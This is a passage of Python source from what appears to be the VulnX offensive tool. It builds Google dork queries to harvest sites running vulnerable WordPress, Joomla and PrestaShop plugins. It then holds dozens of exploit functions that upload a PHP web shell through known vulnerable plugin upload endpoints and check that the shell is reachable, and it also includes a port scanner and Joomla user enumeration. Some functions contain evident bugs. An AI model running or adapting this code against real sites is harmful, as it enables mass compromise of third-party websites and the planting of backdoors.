'inurl":/modules/cartabandonmentpro/"', 73 | 'cartabandonmentpro_old' : 'inurl":/modules/cartabandonmentproOld/"' , 74 | 'videostab' : 'inurl":/modules/videostab/"', 75 | 'wg24themeadministration': 'inurl":/modules//wg24themeadministration/"', 76 | 'fieldvmegamenu' : 'inurl":/modules/fieldvmegamenu/"', 77 | 'wdoptionpanel' : 'inurl":/modules/wdoptionpanel/"', 78 | 'pk_flexmenu' : 'inurl":/modules/pk_flexmenu/"', 79 | 'pk_vertflexmenu' : 'inurl":/modules/pk_vertflexmenu/"', 80 | 'nvn_export_orders' : 'inurl":/modules/nvn_export_orders/"', 81 | 'tdpsthemeoptionpanel' : 'inurl":/modules/tdpsthemeoptionpanel/"', 82 | 'masseditproduct' : 'inurl":/modules/lib/redactor/"', 83 | } 84 | 85 | class Dorks: 86 | 87 | @staticmethod 88 | def getdorksbyname(exploitname): 89 | if exploitname in wp_contentdorks: 90 | return wp_contentdorks[exploitname] 91 | elif exploitname in wp_admindorks: 92 | return wp_admindorks[exploitname] 93 | elif exploitname in wpajx: 94 | return wpajx[exploitname] 95 | elif exploitname in wpindex: 96 | return wpindex[exploitname] 97 | elif exploitname in joomla: 98 | return joomla[exploitname] 99 | elif exploitname in prestashop: 100 | return prestashop[exploitname] 101 | 102 | @staticmethod 103 | def searchengine(exploitname,headers,output_dir,numberpage): 104 | try : 105 | print (' %s Searching for %s dork url' %(run,exploitname)) 106 | numberpage = numberpage*10 107 | for np in range(0,numberpage,10): 108 | starty = time.time() 109 | if np==0: 110 | time.sleep(random.randint(1,2)) 111 | print(' %s Page n° 1 ' % (info)) 112 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname) 113 | print(' %s searching for : %s'% (que,googlequery)) 114 | res = requests.get(googlequery,headers).text 115 | if (re.findall(re.compile(r'CAPTCHA'),res)): 116 | print(' %s Bot Detected The block will expire shortly' % bad) 117 | else: 118 | Dorks.WP_dorksconditions(exploitname,res,output_dir) 119 | print ('------------------------------------------------') 120 | else: 121 | time.sleep(random.randint(3,5)) 122 | print(' %s Page n° %i ' % (info,np/10+1)) 123 | googlequery = 'https://www.google.com/search?q='+Dorks.getdorksbyname(exploitname)+'&start='+str(np) 124 | res = requests.get(googlequery,headers).text 125 | print(' %s searching for : %s'% (que,googlequery)) 126 | if (re.findall(re.compile(r'CAPTCHA'),res)): 127 | print(' %s Bot Detected The block will expire shortly' % bad) 128 | else: 129 | Dorks.WP_dorksconditions(exploitname,res,output_dir) 130 | print ('------------------------------------------------') 131 | endy = time.time() 132 | elapsed = endy - starty 133 | print (' %s Elapsed Time : %.2f seconds' % (info,elapsed)) 134 | print("%s----------------%s"%(bannerblue,end)) 135 | export.close() 136 | except Exception as msg: 137 | print(' %s exploitname %s ' %(bad,msg)) 138 | np=+10 139 | 140 | @staticmethod 141 | def WP_dorksconditions(exploitname,response,output_dir): 142 | webs = [] 143 | if exploitname in wp_contentdorks: 144 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-content/plugins/\w+'),response) 145 | if len(dorks) > 0: 146 | for web in dorks: 147 | if web not in webs: 148 | webs.append(web) 149 | for i in range(len(webs)): 150 | domains = parsify(webs[i]) 151 | print (' %s URL : %s ' %(good , webs[i])) 152 | print (' %s DOMAIN: %s ' %(good , domains)) 153 | export.write(domains) 154 | export.write('\n') 155 | elif exploitname in wp_admindorks: 156 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/wp-admin/\w+'),response) 157 | if len(dorks) > 0: 158 | for web in dorks: 159 | if web not in webs: 160 | webs.append(web) 161 | for i in range(len(webs)): 162 | domains = parsify(webs[i]) 163 | print (' %s URL : %s ' %(good , webs[i])) 164 | print (' %s DOMAIN: %s ' %(good , domains)) 165 | export.write(domains) 166 | export.write('\n') 167 | elif exploitname in wpajx: 168 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/jm-ajax/upload_file/'),response) 169 | if len(dorks) > 0: 170 | for web in dorks: 171 | if web not in webs: 172 | webs.append(web) 173 | for i in range(len(webs)): 174 | domains = parsify(webs[i]) 175 | print (' %s URL : %s ' %(good , webs[i])) 176 | print (' %s DOMAIN: %s ' %(good , domains)) 177 | export.write(domains) 178 | export.write('\n') 179 | elif exploitname in wpindex: 180 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php/wp-json/wp/'),response) 181 | if len(dorks) > 0: 182 | for web in dorks: 183 | if web not in webs: 184 | webs.append(web) 185 | for i in range(len(webs)): 186 | domains = parsify(webs[i]) 187 | print (' %s URL : %s ' %(good , webs[i])) 188 | print (' %s DOMAIN: %s ' %(good , domains)) 189 | export.write(domains) 190 | export.write('\n') 191 | elif exploitname in joomla: 192 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/index.php?option=com_jce'),response) 193 | if len(dorks) > 0: 194 | for web in dorks: 195 | if web not in webs: 196 | webs.append(web) 197 | for i in range(len(webs)): 198 | domains = parsify(webs[i]) 199 | print (' %s URL : %s ' %(good , webs[i])) 200 | print (' %s DOMAIN: %s ' %(good , domains)) 201 | export.write(domains) 202 | export.write('\n') 203 | elif exploitname in prestashop: 204 | dorks = re.findall(re.compile(r'https?://+?\w+?[a-zA-Z0-9-_.]+?[a-zA-Z0-9-_.]?\w+\.\w+/?/modules/\w+'),response) 205 | if len(dorks) > 0: 206 | for web in dorks: 207 | if web not in webs: 208 | webs.append(web) 209 | for i in range(len(webs)): 210 | domains = parsify(webs[i]) 211 | print (' %s URL : %s ' %(good , webs[i])) 212 | print (' %s DOMAIN: %s ' %(good , domains)) 213 | export.write(domains) 214 | export.write('\n') 215 | 216 | class DorkList(): 217 | 218 | @staticmethod 219 | def dorkslist(): 220 | print(""" 221 | %sWordPress Joomla Prestashop 222 | --------- ------ -----------%s 223 | blaze comjce columnadverts 224 | catpro comfabrik soopabanners 225 | cherry comjdownloads vtslide 226 | dm comfoxcontact simpleslideshow 227 | fromcraft productpageadverts 228 | synoptic productpageadvertsb 229 | shop jro_homepageadvertise 230 | revslider attributewizardpro 231 | adsmanager oneattributewizardpro 232 | inboundiomarketing attributewizardpro_old 233 | wysija attributewizardpro_x 234 | powerzoomer advancedslider 235 | showbiz cartabandonmentpro 236 | jobmanager cartabandonmentpro_old 237 | injection videostab 238 | thumbslider wg24themeadministration 239 | fieldvmegamenu 240 | wdoptionpanel 241 | pk_flexmenu 242 | pk_vertflexmenu 243 | nvn_export_orders 244 | tdpsthemeoptionpanel 245 | masseditproduct 246 | """%(W,end)) 247 | 248 | 249 | 250 | @staticmethod 251 | def wp_dorkTable(): 252 | print(""" 253 | WordPress 254 | --------- 255 | blaze 256 | catpro 257 | cherry 258 | dm 259 | fromcraft 260 | synoptic 261 | shop 262 | revslider 263 | adsmanager 264 | inboundiomarketing 265 | wysija 266 | powerzoomer 267 | showbiz 268 | jobmanager 269 | injection 270 | thumbslider 271 | """) 272 | 273 | @staticmethod 274 | def joo_dorkTable(): 275 | print(""" 276 | Joomla 277 | ------ 278 | comjce 279 | comfabrik 280 | comjdownloads 281 | comfoxcontact 282 | """) 283 | 284 | @staticmethod 285 | def ps_dorkTable(): 286 | 287 | print(""" 288 | Prestashop 289 | ----------- 290 | columnadverts 291 | soopabanners 292 | vtslide 293 | simpleslideshow 294 | productpageadverts 295 | productpageadvertsb 296 | jro_homepageadvertise 297 | attributewizardpro 298 | oneattributewizardpro 299 | attributewizardpro_old 300 | attributewizardpro_x 301 | advancedslider 302 | cartabandonmentpro 303 | cartabandonmentpro_old 304 | videostab 305 | wg24themeadministration 306 | fieldvmegamenu 307 | wdoptionpanel 308 | pk_flexmenu 309 | pk_vertflexmenu 310 | nvn_export_orders 311 | tdpsthemeoptionpanel 312 | masseditproduct 313 | """) 314 | 315 | @staticmethod 316 | def loko_dorkTable(): 317 | print(""" 318 | Lokomedia 319 | ------ 320 | """) 321 | 322 | @staticmethod 323 | def dru_dorkTable(): 324 | print(""" 325 | Drupal 326 | ------ 327 | """) -------------------------------------------------------------------------------- /modules/druExploits.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import datetime 4 | import requests 5 | from common.uriParser import parsing_url as hostd 6 | now = datetime.datetime.now() 7 | year = now.strftime('%Y') 8 | month= now.strftime('%m') 9 | 10 | import os 11 | Session = requests.Session() 12 | 13 | from common.colors import failexploit , vulnexploit , que , info , good 14 | from common.requestUp import sendrequest as vxpost 15 | from common.requestUp import getrequest as vxget 16 | -------------------------------------------------------------------------------- /modules/jooExploits.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import datetime 4 | import requests 5 | now = datetime.datetime.now() 6 | year = now.strftime('%Y') 7 | month= now.strftime('%m') 8 | 9 | import os 10 | Session = requests.Session() 11 | 12 | from common.colors import failexploit , vulnexploit , que , info , good 13 | 14 | def com_jce(url,headers): 15 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 16 | endpoint = url+"/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20" 17 | data = { 18 | 'upload-dir':'./../../', 19 | 'upload-overwrite':0, 20 | 'Filedata' : [open('shell/VulnX.gif','rb')], 21 | 'action':'Upload', 22 | } 23 | content = Session.post(endpoint,data,headers) 24 | path_shell = url + "/VulnX.gif" 25 | res=requests.get(path_shell, headers).text 26 | matches = re.findall(re.compile(r'/image/gif/'),res) 27 | if matches: 28 | print (' %s com_jce %s %s' %(que,vulnexploit,path_shell)) 29 | else: 30 | print (' %s com_jce %s' %(que , failexploit)) 31 | 32 | def com_media(url,headers): 33 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 34 | endpoint = url+"/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=" 35 | headers={"content-type":["form-data"]} 36 | fieldname = 'Filedata[]' 37 | shell = open('shell/VulnX.txt','rb') 38 | data = { 39 | fieldname:shell, 40 | } 41 | content = Session.post(endpoint,data,headers) 42 | path_shell = endpoint+"/images/XAttacker.txt" 43 | response = requests.get(path_shell,headers).text 44 | if re.findall(r'Tig', response): 45 | print (' %s com_media %s %s' %(que,vulnexploit,path_shell)) 46 | else: 47 | print (' %s com_media %s' %(que , failexploit)) 48 | 49 | 50 | #def com_jdownloads(url,headers): 51 | # endpoint = url+"index.php?option=com_jdownloads&Itemid=0&view=upload" 52 | # files = open('shell/VulnX.zip','rb') 53 | # shell = open('shell/VulnX.gif','rb') 54 | # data = { 55 | # 'name' : 'Tig', 56 | # 'mail' :'tig@tig.com', 57 | # 'filetitle' :'Tig', 58 | # 'catlist':'1', 59 | # 'license':'0', 60 | # 'language':'0', 61 | # 'system':'0', 62 | # 'file_upload': files, 63 | # 'pic_upload':shell, 64 | # 'description':'

zot

', 65 | # 'senden':'Send file', 66 | # 'option':'com_jdownloads', 67 | # 'view':'upload', 68 | # 'send':'1', 69 | # '24c22896d6fe6977b731543b3e44c22f':'1', 70 | # } 71 | # upload_file = Session.post(endpoint,data) 72 | # path_shell = endpoint+"/images/jdownloads/screenshots/VulnX.gif?Vuln=X" 73 | # response = requests.get(path_shell).text 74 | # if re.findall(r'Vuln X', response): 75 | # print (' %s com_jdownloads %s %s' %(que,vulnexploit,path_shell)) 76 | # else: 77 | # print (' %s com_jdownloads %s' %(que , failexploit)) 78 | 79 | #def com_jdownloadsb(url,headers): 80 | # headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 81 | # endpoint = url+"/images/jdownloads/screenshots/VulnX.php" 82 | # headers={"content-type":["form-data"]} 83 | # files = open('shell/VulnX.zip','rb') 84 | # shell = open('shell/VulnX.gif','rb') 85 | # data = { 86 | # 'name' : 'Tig', 87 | # 'mail' :'tig@tig.com', 88 | # 'filetitle' :'Tig', 89 | # 'catlist':'1', 90 | # 'license':'0', 91 | # 'language':'0', 92 | # 'system':'0', 93 | # 'file_upload': files, 94 | # 'pic_upload':shell, 95 | # 'description':'

zot

', 96 | # 'senden':'Send file', 97 | # 'option':'com_jdownloads', 98 | # 'view':'upload', 99 | # 'send':'1', 100 | # '24c22896d6fe6977b731543b3e44c22f':'1' 101 | # } 102 | # response = requests.get(endpoint,headers).text 103 | # if re.findall(r'200', response): 104 | # print (' %s com_jdownloads2 %s %s' %(que,vulnexploit,endpoint)) 105 | # else: 106 | # print (' %s com_jdownloads2 %s' %(que , failexploit)) 107 | 108 | def com_fabrika(url,headers): 109 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 110 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 111 | 112 | headers={"content-type":["form-data"]} 113 | fieldname = 'file' 114 | shell = open('shell/VulnX.php','rb') 115 | data = { 116 | fieldname:shell, 117 | } 118 | content = Session.post(endpoint,data,headers) 119 | path_shell = endpoint+"/images/XAttacker.txt" 120 | response = requests.get(path_shell,headers).text 121 | if re.findall(r'Vuln X', response): 122 | print (' %s com_fabrik1 %s %s' %(que,vulnexploit,path_shell)) 123 | else: 124 | print (' %s com_fabrik1 %s' %(que , failexploit)) 125 | 126 | def com_fabrikb(url,headers): 127 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 128 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 129 | 130 | headers={"content-type":["form-data"]} 131 | fieldname = 'file' 132 | shell = open('shell/VulnX.txt','rb') 133 | data = { 134 | fieldname:shell, 135 | } 136 | content = Session.post(endpoint,data,headers) 137 | path_shell = endpoint+"/images/XAttacker.txt" 138 | response = requests.get(path_shell,headers).text 139 | if re.findall(r'Tig', response): 140 | print (' %s com_fabrik2 %s %s' %(que,vulnexploit,path_shell)) 141 | else: 142 | print (' %s com_fabrik2 %s' %(que , failexploit)) 143 | 144 | def com_foxcontact(url,headers): 145 | headers['User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801' 146 | # foxf = {'components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php', 147 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php', 148 | # 'index.php?option=com_foxcontact&view=loader&type=uploader&owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php', 149 | # 'components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php'} 150 | endpoint = url+"/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" 151 | 152 | headers={"content-type":["form-data"]} 153 | fieldname = 'file' 154 | shell = open('shell/VulnX.txt','rb') 155 | data = { 156 | fieldname:shell, 157 | } 158 | content = Session.post(endpoint,data,headers) 159 | path_shell = endpoint+"/images/XAttacker.txt" 160 | response = requests.get(path_shell,headers).text 161 | if re.findall(r'Tig', response): 162 | print (' %s com_foxcontact %s %s' %(que,vulnexploit,path_shell)) 163 | else: 164 | print (' %s com_foxcontact %s' %(que , failexploit)) 165 | 166 | def com_adsmanager(url,headers): 167 | endpoint = url + "/index.php?option=com_adsmanager&task=upload&tmpl=component" 168 | img = open('shell/VulnX.php', 'rb') 169 | name_img= os.path.basename('shell/VulnX.html') 170 | files= {'image': (name_img,img,'form-data',{'Expires': '0'}) } 171 | upload_file = Session.post(endpoint,files=files) 172 | shellup = url + "/tmp/plupload/VulnX.html" 173 | checkShell = requests.get(shellup).text 174 | statusCheck = re.findall(re.compile(r'VulnX'),checkShell) 175 | if statusCheck: 176 | print(' %s com_adsmanager %s %s' %(que,vulnexploit,shellup)) 177 | else: 178 | print(' %s com_adsmanager %s' %(que , failexploit)) 179 | 180 | def com_blog(url,headers): 181 | endpoint = url + "/index.php?option=com_myblog&task=ajaxupload" 182 | checkShell = requests.get(endpoint).text 183 | statusCheck = re.findall(re.compile(r'has been uploaded'),endpoint) 184 | if statusCheck: 185 | print(' %s com_blog %s %s' %(que,vulnexploit,endpoint)) 186 | else: 187 | print(' %s com_blog %s' %(que , failexploit)) 188 | 189 | def com_users(url,headers): 190 | endpoint = url + "/index.php?option=com_users&view=registration" 191 | checkShell = requests.get(endpoint).text 192 | statusCheck = re.findall(re.compile(r'jform_email2-lbl'),endpoint) 193 | if statusCheck: 194 | print(' %s com_users %s %s' %(que,vulnexploit,endpoint)) 195 | else: 196 | print(' %s com_users %s' %(que , failexploit)) 197 | 198 | def comweblinks(url,headers): 199 | endpoint = url + "/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=" 200 | token = re.findall(re.compile(r'
(.+?)' 10 | pattern = re.compile(regex) 11 | version = re.findall(pattern, response) 12 | if version: 13 | return print (' %s Version : %s' %(good,version[0])) 14 | 15 | def joo_user(url,headers): 16 | users = [] 17 | endpoint = url + '/?format=feed' 18 | response = requests.get(endpoint,headers).text 19 | regex = r'(.+?) \((.+?)\)' 20 | pattern = re.compile(regex) 21 | joouser = re.findall(pattern, response) 22 | if joouser: 23 | joouser = sorted(set(joouser)) 24 | for user in joouser: 25 | users.append(user[1]) 26 | msg = user[1] + ": " + user[0] 27 | print(msg) 28 | 29 | def joo_template(url,headers): 30 | main_endpoint = url + '/index.php' 31 | responsea = requests.get(main_endpoint,headers).text 32 | WebTemplates = re.findall("/templates/(.+?)/", responsea) 33 | WebTemplates = sorted(set(WebTemplates)) 34 | adm_endpoint = url + '/administrator/index.php' 35 | responseb = requests.get(adm_endpoint,headers).text 36 | AdminTemplates = re.findall("/administrator/templates/(.+?)/", responseb) 37 | AdminTemplates = sorted(set(AdminTemplates)) 38 | if WebTemplates: 39 | for WebTemplate in WebTemplates: 40 | return print (' %s WebTemplate : %s' %(good,WebTemplate[0])) 41 | if AdminTemplates: 42 | for AdminTemplate in AdminTemplates: 43 | return print (' %s AdminTemplate : %s' %(good,AdminTemplate[0])) -------------------------------------------------------------------------------- /modules/portChecker.py: -------------------------------------------------------------------------------- 1 | 2 | from common.colors import que,portopen,portclose 3 | import socket 4 | portsobject = { 5 | 21 :'FTP' , 6 | 22 :'SSH' , 7 | 23 :'Telnet' , 8 | 25 :'SMTP' , 9 | 43 :'Whois' , 10 | 53 :'DNS' , 11 | 68 :'DHCP' , 12 | 80 :'HTTP' , 13 | 110 :'POP3' , 14 | 115 :'SFTP' , 15 | 119 :'NNTP' , 16 | 123 :'NTP' , 17 | 139 :'NetBIOS' , 18 | 143 :'IMAP' , 19 | 161 :'SNMP' , 20 | 220 :'IMAP3' , 21 | 389 :'LDAP' , 22 | 443 :'SSL' , 23 | 1521 :'Oracle SQL' , 24 | 2049 :'NFS' , 25 | 3306 :'mySQL' , 26 | 5800 :'VNC' , 27 | 8080 :'HTTP' , 28 | } 29 | def portscan(host,port): 30 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | if port: 32 | result = sock.connect_ex((host, port)) 33 | if result == 0: 34 | print (' %s %s %s %s' %(que,port,portopen,portsobject[port])) 35 | else: 36 | print (' %s %s %s %s' %(que,port,portclose,portsobject[port])) 37 | 38 | -------------------------------------------------------------------------------- /modules/prestaExploits.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import os 4 | Session = requests.Session() 5 | from common.colors import que,vulnexploit,que,failexploit 6 | 7 | #columnadvert 8 | def columnadverts(url,headers): 9 | endpoint = url + "/modules/columnadverts/uploadimage.php" 10 | img = open('shell/VulnX.php', 'rb') 11 | name_img= os.path.basename('shell/VulnX.php') 12 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 13 | upload_file = Session.post(endpoint,files=files) 14 | shellup = url + "/modules/columnadverts/slides/VulnX.php?Vuln=X" 15 | checkShell = requests.get(shellup).text 16 | statusCheck = re.findall(re.compile(r'Vuln X'),upload_file) 17 | if statusCheck: 18 | print(' %s column-advert %s %s' %(que,vulnexploit,shellup)) 19 | else: 20 | print(' %s column-advert %s' %(que , failexploit)) 21 | 22 | #soopabanner 23 | def soopabanners(url,headers): 24 | endpoint = url + "/modules/soopabanners/uploadimage.php" 25 | img = open('shell/VulnX.php', 'rb') 26 | name_img= os.path.basename('shell/VulnX.php') 27 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 28 | upload_file = Session.post(endpoint,files=files) 29 | shellup = url + "/modules/soopabanners/slides/VulnX.php?Vuln=X" 30 | checkShell = requests.get(shellup).text 31 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 32 | if statusCheck: 33 | print(' %s soopa-banner %s %s' %(que,vulnexploit,shellup)) 34 | else: 35 | print(' %s soopa-banner %s' %(que , failexploit)) 36 | 37 | #vtermslideshow 38 | def vtslide(url,headers): 39 | endpoint = url + "/modules/vtermslideshow/uploadimage.php" 40 | img = open('shell/VulnX.php', 'rb') 41 | name_img= os.path.basename('shell/VulnX.php') 42 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 43 | upload_file = Session.post(endpoint,files=files) 44 | shellup = url + "/modules/vtermslideshow/slides/VulnX.php?Vuln=X" 45 | checkShell = requests.get(shellup).text 46 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 47 | if statusCheck: 48 | print(' %s vterm-slideshowbar %s %s' %(que,vulnexploit,shellup)) 49 | else: 50 | print(' %s vterm-slideshowbar %s' %(que , failexploit)) 51 | 52 | #simpleslideshow 53 | def simpleslideshow(url,headers): 54 | endpoint = url + "/modules/simpleslideshow/uploadimage.php" 55 | img = open('shell/VulnX.php', 'rb') 56 | name_img= os.path.basename('shell/VulnX.php') 57 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 58 | upload_file = Session.post(endpoint,files=files) 59 | shellup = url + "/modules/simpleslideshow/slides/VulnX.php?Vuln=X" 60 | checkShell = requests.get(shellup).text 61 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 62 | if statusCheck: 63 | print(' %s simple-slideshow %s %s' %(que,vulnexploit,shellup)) 64 | else: 65 | print(' %s simple-slideshow %s' %(que , failexploit)) 66 | 67 | #productpageadverts 68 | def productpageadverts(url,headers): 69 | endpoint = url + "/modules/productpageadverts/uploadimage.php" 70 | img = open('shell/VulnX.php', 'rb') 71 | name_img= os.path.basename('shell/VulnX.php') 72 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 73 | upload_file = Session.post(endpoint,files=files) 74 | shellup = url + "/modules/productpageadverts/slides/VulnX.php?Vuln=X" 75 | checkShell = requests.get(shellup).text 76 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 77 | if statusCheck: 78 | print(' %s pageadvertise %s %s' %(que,vulnexploit,shellup)) 79 | else: 80 | print(' %s pageadvertise %s' %(que , failexploit)) 81 | 82 | #productpageadvertsb 83 | def productpageadvertsb(url,headers): 84 | endpoint = url + "/modules/homepageadvertise2/uploadimage.php" 85 | img = open('shell/VulnX.php', 'rb') 86 | name_img= os.path.basename('shell/VulnX.php') 87 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 88 | upload_file = Session.post(endpoint,files=files) 89 | shellup = url + "/modules/homepageadvertise2/slides/VulnX.php?Vuln=X" 90 | checkShell = requests.get(shellup).text 91 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 92 | if statusCheck: 93 | print(' %s pageadvertise2 %s %s' %(que,vulnexploit,shellup)) 94 | else: 95 | print(' %s pageadvertise2 %s' %(que , failexploit)) 96 | 97 | #jro_homepageadvertise 98 | def jro_homepageadvertise(url,headers): 99 | endpoint = url + "/modules/jro_homepageadvertise/uploadimage.php" 100 | img = open('shell/VulnX.php', 'rb') 101 | name_img= os.path.basename('shell/VulnX.php') 102 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 103 | upload_file = Session.post(endpoint,files=files) 104 | shellup = url + "/modules/jro_homepageadvertise/slides/VulnX.php?Vuln=X" 105 | checkShell = requests.get(shellup).text 106 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 107 | if statusCheck: 108 | print(' %s jro_homepageadvertise %s %s' %(que,vulnexploit,shellup)) 109 | else: 110 | print(' %s jro_homepageadvertise %s' %(que , failexploit)) 111 | 112 | #attributewizardpro 113 | def attributewizardpro(url,headers): 114 | endpoint = url + "/modules/attributewizardpro/file_upload.php" 115 | img = open('shell/VulnX.php', 'rb') 116 | name_img= os.path.basename('shell/VulnX.php') 117 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 118 | upload_file = Session.post(endpoint,files=files) 119 | shellup = url + "/modules/attributewizardpro/file_uploads/VulnX.php?Vuln=X" 120 | checkShell = requests.get(shellup).text 121 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 122 | if statusCheck: 123 | print(' %s attribute-wizardpro %s %s' %(que,vulnexploit,shellup)) 124 | else: 125 | print(' %s attribute-wizardpro %s' %(que , failexploit)) 126 | 127 | #-------------attributewizardpro 128 | def oneattributewizardpro(url,headers): 129 | endpoint = url + "/modules/1attributewizardpro/file_upload.php" 130 | img = open('shell/VulnX.php', 'rb') 131 | name_img= os.path.basename('shell/VulnX.php') 132 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 133 | upload_file = Session.post(endpoint,files=files) 134 | shellup = url + "/modules/1attributewizardpro/file_uploads/VulnX.php?Vuln=X" 135 | checkShell = requests.get(shellup).text 136 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 137 | if statusCheck: 138 | print(' %s oneattributewizardpro %s %s' %(que,vulnexploit,shellup)) 139 | else: 140 | print(' %s oneattributewizardpro %s' %(que , failexploit)) 141 | 142 | 143 | #attributewizardproOLD 144 | def attributewizardpro_old(url,headers): 145 | endpoint = url + "/modules/attributewizardpro.OLD/file_upload.php" 146 | img = open('shell/VulnX.php', 'rb') 147 | name_img= os.path.basename('shell/VulnX.php') 148 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 149 | upload_file = Session.post(endpoint,files=files) 150 | shellup = url + "/modules/attributewizardpro.OLD/file_uploads/VulnX.php?Vuln=X" 151 | checkShell = requests.get(shellup).text 152 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 153 | if statusCheck: 154 | print(' %s attributewizardpro_old%s %s' %(que,vulnexploit,shellup)) 155 | else: 156 | print(' %s attributewizardpro_old%s' %(que , failexploit)) 157 | 158 | #attributewizardproold 159 | def attributewizardpro_x(url,headers): 160 | endpoint = url + "/modules/attributewizardpro_x/file_upload.php" 161 | img = open('shell/VulnX.php', 'rb') 162 | name_img= os.path.basename('shell/VulnX.php') 163 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 164 | upload_file = Session.post(endpoint,files=files) 165 | shellup = url + "/modules/attributewizardpro_x/file_uploads/VulnX.php?Vuln=X" 166 | checkShell = requests.get(shellup).text 167 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 168 | if statusCheck: 169 | print(' %s attributewizardpro %s %s' %(que,vulnexploit,shellup)) 170 | else: 171 | print(' %s attributewizardpro %s' %(que , failexploit)) 172 | 173 | #advancedslider 174 | def advancedslider(url,headers): 175 | endpoint = url + "/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php" 176 | img = open('shell/VulnX.php.png', 'rb') 177 | name_img= os.path.basename('shell/VulnX.php.png') 178 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 179 | upload_file = Session.post(endpoint,files=files) 180 | shellup = url + "/modules/advancedslider/uploads/VulnX.php.png?Vuln=X" 181 | checkShell = requests.get(shellup).text 182 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 183 | if statusCheck: 184 | print(' %s advancedslider %s %s' %(que,vulnexploit,shellup)) 185 | else: 186 | print(' %s advancedslider %s' %(que , failexploit)) 187 | 188 | 189 | #cartabandonmentpro 190 | def cartabandonmentpro(url,headers): 191 | endpoint = url + "/modules/cartabandonmentpro/upload.php" 192 | img = open('shell/VulnX.php.png', 'rb') 193 | name_img= os.path.basename('shell/VulnX.php.png') 194 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 195 | upload_file = Session.post(endpoint,files=files) 196 | shellup = url + "/modules/cartabandonmentpro/uploads/VulnX.php.png?Vuln=X" 197 | checkShell = requests.get(shellup).text 198 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 199 | if statusCheck: 200 | print(' %s cartabandonmentpro %s %s' %(que,vulnexploit,shellup)) 201 | else: 202 | print(' %s cartabandonmentpro %s' %(que , failexploit)) 203 | 204 | #cartabandonmentpro_old 205 | def cartabandonmentpro_old(url,headers): 206 | endpoint = url + "/modules/cartabandonmentproOld/upload.php" 207 | img = open('shell/VulnX.php.png', 'rb') 208 | name_img= os.path.basename('shell/VulnX.php.png') 209 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 210 | upload_file = Session.post(endpoint,files=files) 211 | shellup = url + "/modules/cartabandonmentproOld/uploads/VulnX.php.png?Vuln=X" 212 | checkShell = requests.get(shellup).text 213 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 214 | if statusCheck: 215 | print(' %s cartabandonmentpro_old%s 